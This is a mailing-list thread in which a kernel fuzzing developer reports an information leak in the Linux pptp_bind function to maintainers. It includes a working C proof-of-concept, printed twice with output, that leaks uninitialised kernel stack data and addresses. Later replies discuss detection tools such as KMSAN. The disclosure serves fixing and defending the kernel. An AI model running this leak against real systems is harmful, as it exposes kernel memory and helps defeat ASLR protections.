Information leak in pptp_bind
85 views
Skip to first unread message
Dmitry Vyukov
Dec 14, 2015, 5:38:48 AM12/14/15
to Dmitry Kozlov, net...@vger.kernel.org, LKML, syzk...@googlegroups.com, Kostya Serebryany, Alexander Potapenko, Dmitry Vyukov, edum...@google.com, Sasha Levin, kees...@google.com, j...@google.com
Hello,
The following program leak various uninit garbage including kernel
addresses and whatever is on kernel stack, in particular defeating
ASLR. The issue is in pptp_bind which does not verify sockaddr_len
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/in6.h>
#include <linux/socket.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
struct sockaddr sa;
unsigned len, i, try;
int fd;
for (try = 0; try < 5; try++) {
fd = socket(AF_PPPOX, SOCK_RAW, PX_PROTO_PPTP);
if (fd == -1)
return;
memset(&sa, 0, sizeof(sa));
bind(fd, &sa, 0);
len = sizeof(sa);
getsockname(fd, &sa, &len);
for (i = 0; i < len; i++)
printf("%02x", ((unsigned char*)&sa)[i]);
printf("\n");
}
return 0;
}
# ./a.out
1800020000004700c012833d00880000b002400000000000005eddc66d2b
1800020000004800408bf13a00880000b002400000000000005eddc66d2b
180002000000490080a5f13a00880000b002400000000000005eddc66d2b
1800020000004a00008ff13a00880000b002400000000000005eddc66d2b
1800020000004b008096f13a00880000b002400000000000005eddc66d2b
The following program leak various uninit garbage including kernel
addresses and whatever is on kernel stack, in particular defeating
ASLR. The issue is in pptp_bind which does not verify sockaddr_len
#include <sys/types.h>
#include <sys/socket.h>
#include <linux/in.h>
#include <linux/in6.h>
#include <linux/socket.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int main(void)
{
struct sockaddr sa;
unsigned len, i, try;
int fd;
for (try = 0; try < 5; try++) {
fd = socket(AF_PPPOX, SOCK_RAW, PX_PROTO_PPTP);
if (fd == -1)
return;
memset(&sa, 0, sizeof(sa));
bind(fd, &sa, 0);
len = sizeof(sa);
getsockname(fd, &sa, &len);
for (i = 0; i < len; i++)
printf("%02x", ((unsigned char*)&sa)[i]);
printf("\n");
}
return 0;
}
# ./a.out
1800020000004700c012833d00880000b002400000000000005eddc66d2b
1800020000004800408bf13a00880000b002400000000000005eddc66d2b
180002000000490080a5f13a00880000b002400000000000005eddc66d2b
1800020000004a00008ff13a00880000b002400000000000005eddc66d2b
1800020000004b008096f13a00880000b002400000000000005eddc66d2b
Hannes Frederic Sowa
Dec 14, 2015, 5:45:01 PM12/14/15
to Dmitry Vyukov, Dmitry Kozlov, net...@vger.kernel.org, LKML, syzk...@googlegroups.com, Kostya Serebryany, Alexander Potapenko, Dmitry Vyukov, edum...@google.com, Sasha Levin, kees...@google.com, j...@google.com
On 14.12.2015 11:38, Dmitry Vyukov wrote:
> The following program leak various uninit garbage including kernel
> addresses and whatever is on kernel stack, in particular defeating
> ASLR. The issue is in pptp_bind which does not verify sockaddr_len.
> The following program leak various uninit garbage including kernel
> addresses and whatever is on kernel stack, in particular defeating
Thanks for the report!
I send out a patch soon.
Wei You
Apr 14, 2017, 3:02:26 PM4/14/17
to syzkaller
Hi, Dmitry,
I am very curious about how to use syzkaller to find "information leak" bugs.
We know that for memory related bugs, syzkaller leverages KASAN to find illegal memory access.
But how syzkaller monitor the bugs that leak information?
Thanks.
Dmitry Vyukov
Apr 18, 2017, 5:27:50 AM4/18/17
to Wei You, syzkaller, Alexander Potapenko
Hi Wei,
I don't remember exactly, but I think I was just looking at source
code around some other bug found by syzkaller. Currently there are no
good means for detecting uses of uninit memory. You can try KMEMCHECK,
but my understanding is that it does not quite work.
We are currently working on KMSAN (kernel analog of user-space MSAN
https://github.com/google/sanitizers/wiki/MemorySanitizer). It will
provide precise, prompt detection of such cases. A work-in-progress
version of KMSAN should be open-sources within next weeks or so.
> --
> You received this message because you are subscribed to the Google Groups
> "syzkaller" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to syzkaller+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
I don't remember exactly, but I think I was just looking at source
code around some other bug found by syzkaller. Currently there are no
good means for detecting uses of uninit memory. You can try KMEMCHECK,
but my understanding is that it does not quite work.
We are currently working on KMSAN (kernel analog of user-space MSAN
https://github.com/google/sanitizers/wiki/MemorySanitizer). It will
provide precise, prompt detection of such cases. A work-in-progress
version of KMSAN should be open-sources within next weeks or so.
> You received this message because you are subscribed to the Google Groups
> "syzkaller" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to syzkaller+...@googlegroups.com.
> For more options, visit https://groups.google.com/d/optout.
Wei You
Apr 19, 2017, 9:45:39 AM4/19/17
to syzkaller
Hi Dmitry,
Thanks for your reply.
When KMSAN is available for open-source, will it be integrated into the latest linux kernel?
Bests,
Wei
Dmitry Vyukov
Apr 19, 2017, 10:18:02 AM4/19/17
to Wei You, syzkaller
On Wed, Apr 19, 2017 at 3:45 PM, Wei You <weiyo...@gmail.com> wrote:
> Hi Dmitry,
>
> Thanks for your reply.
> When KMSAN is available for open-source, will it be integrated into the
> latest linux kernel?
I hope so. But such things don't happen in a day.
> Hi Dmitry,
>
> Thanks for your reply.
> When KMSAN is available for open-source, will it be integrated into the
> latest linux kernel?
Reply all
Reply to author
Forward
0 new messages